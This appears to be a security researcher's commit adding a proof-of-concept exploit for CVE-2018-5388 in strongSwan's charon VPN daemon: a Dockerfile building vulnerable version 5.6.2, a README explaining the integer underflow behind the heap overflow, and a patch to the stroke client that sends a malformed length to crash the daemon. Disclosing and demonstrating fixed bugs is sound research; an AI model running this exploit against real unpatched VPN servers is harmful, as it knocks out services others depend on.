Proof-of-concept exploit for CVE-2018-5388.

kevinbackhouse · kevinbackhouse · commit 26cf2fb86bb2 · 2018-09-27T11:07:12.000+01:00
diff --git a/strongSwan/CVE-2018-5388/Dockerfile b/strongSwan/CVE-2018-5388/Dockerfile
@@ -0,0 +1,45 @@
+FROM ubuntu:artful
+
+RUN apt-get update && \
+    apt-get install -y \
+      openjdk-8-jdk git-core gnupg flex bison gperf build-essential \
+      zip curl zlib1g-dev gcc-multilib g++-multilib libc6-dev-i386 \
+      lib32ncurses5-dev x11proto-core-dev libx11-dev lib32z-dev ccache \
+      libgl1-mesa-dev libxml2-utils xsltproc unzip python gdb python3 \
+      tmux screen pkg-config libtool automake sudo libgmp-dev iptables \
+      xl2tpd module-init-tools supervisor emacs gettext libcap-dev
+
+RUN groupadd vpn
+RUN useradd -g vpn vpn
+
+WORKDIR /opt/work
+RUN git clone git://git.strongswan.org/strongswan.git
+RUN cd strongswan && git checkout 5.6.2 && ./autogen.sh && \
+    ./configure --with-capabilities=libcap --with-user=vpn --with-group=vpn && \
+    make && make install
+
+# switch over to the 'attacker' user, since root access is no longer required
+RUN addgroup attacker --gid 1001
+RUN adduser attacker --disabled-password --uid 1001 --gid 1001
+RUN adduser attacker vpn
+
+# We need to give the "attacker" user sudo permission so that we can
+# start strongswan inside the container. The sudo privileges are not
+# used to run the exploit. For that, the attacker only needs to be a
+# member of the "vpn" group.
+RUN adduser attacker sudo
+RUN echo "attacker:x" | chpasswd  # sudo password is "x"
+
+USER attacker
+WORKDIR /home/attacker/
+
+# Get a copy of the strongswan codebase for the "attacker" user. This
+# is just a lazy way to write the code for the exploit. The only thing
+# that we will use from this copy of the code is the "stroke" utility.
+# We will modify the code slightly and use stroke to send a malicious
+# message to the charon daemon.
+RUN git clone git://git.strongswan.org/strongswan.git
+COPY stroke_patch.txt /home/attacker/stroke_patch.txt
+RUN cd strongswan && git checkout 5.6.2 && \
+    git apply ../stroke_patch.txt && \
+    ./autogen.sh && ./configure && make
diff --git a/strongSwan/CVE-2018-5388/README.md b/strongSwan/CVE-2018-5388/README.md
@@ -0,0 +1,50 @@
+# Buffer overflow in strongSwan VPN's charon server (CVE-2018-5388)
+
+This directory contains a proof-of-concept exploit for a buffer overflow vulnerability in [strongSwan](https://www.strongswan.org/) VPN's [charon](https://wiki.strongswan.org/projects/strongswan/wiki/Charon) daemon. The bug was assigned [CVE-2018-5388](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5388). It was fixed in strongSwan version [5.6.3](https://www.strongswan.org/blog/2018/05/28/strongswan-5.6.3-released.html).
+
+# The bug
+
+The bug is in this code ([src/libcharon/plugins/stroke/stroke_socket.c:634](https://github.com/strongswan/strongswan/blob/3232cf68b98a944d3379ba141b742befb90b8f85/src/libcharon/plugins/stroke/stroke_socket.c#L634)):
+
+```
+if (!stream->read_all(stream, (char*)msg + sizeof(len), len - sizeof(len)))
+```
+
+The value of `len` is read from a socket (on [line 621](https://github.com/strongswan/strongswan/blob/3232cf68b98a944d3379ba141b742befb90b8f85/src/libcharon/plugins/stroke/stroke_socket.c#L621)), so it could be vulnerable to attack. The code does not check that `len >= sizeof(len)`, so the calculation of `len - sizeof(len)` could overflow negatively and produce a very large value (of type `size_t`). This will cause a heap buffer overflow in the call to `read_all`, because the size of the `msg` buffer is very small and `read_all` will keep reading data from the socket until the connection is closed (or it reads 2^64 bytes).
+
+# Running the PoC
+
+To demonstrate the PoC in a safe environment, we will run the vulnerable version of strongSwan in a [docker](https://www.docker.com/) container.
+
+First, build the docker image:
+
+```
+docker build . -t strongswan
+```
+
+As you can see from the Dockerfile, we have installed strongSwan version 5.6.2. We have also created a user named "attacker". This user is a member of the `vpn` group, so that they can use the [stroke](https://wiki.strongswan.org/projects/strongswan/wiki/IpsecStroke) utility to query the [charon](https://wiki.strongswan.org/projects/strongswan/wiki/Charon) daemon. The attacker user is also a member of the `sudo` group, but this is only to enable us to start `ipsec`. Superuser permissions are not used for the actual attack.
+
+Now start the container:
+
+```
+docker run --privileged -i -t strongswan
+```
+
+The `--privileged` flag is needed to start `ipsec` inside the container. Do this now:
+
+```
+sudo ipsec start  # sudo password is "x"
+```
+
+Now run the attack:
+
+```
+./strongswan/src/stroke/.libs/stroke statusall
+```
+
+You will see an error message like this:
+
+```
+ipsec_starter[26]: charon has died -- restart scheduled (5sec)
+```
+The charon daemon crashed due to a buffer overflow which we triggered by sending it a malicious message.
diff --git a/strongSwan/CVE-2018-5388/stroke_patch.txt b/strongSwan/CVE-2018-5388/stroke_patch.txt
@@ -0,0 +1,30 @@
+diff --git a/src/stroke/stroke.c b/src/stroke/stroke.c
+index 6571815e5..7b79c3aaf 100644
+--- a/src/stroke/stroke.c
++++ b/src/stroke/stroke.c
+@@ -78,6 +78,7 @@ static int send_stroke_msg(stroke_msg_t *msg)
+ 	stream_t *stream;
+ 	char *uri, buffer[512], *pass;
+ 	int count;
++	size_t oldlen;
+ 
+ 	if (msg->length == UINT16_MAX)
+ 	{
+@@ -98,13 +99,16 @@ static int send_stroke_msg(stroke_msg_t *msg)
+ 		return -1;
+ 	}
+ 
+-	if (!stream->write_all(stream, msg, msg->length))
++	oldlen = msg->length;
++	msg->length = 1;
++	if (!stream->write_all(stream, msg, oldlen))
+ 	{
+ 		fprintf(stderr, "sending stroke message failed\n");
+ 		stream->destroy(stream);
+ 		free(msg);
+ 		return -1;
+ 	}
++	exit(0);
+ 
+ 	while ((count = stream->read(stream, buffer, sizeof(buffer)-1, TRUE)) > 0)
+ 	{
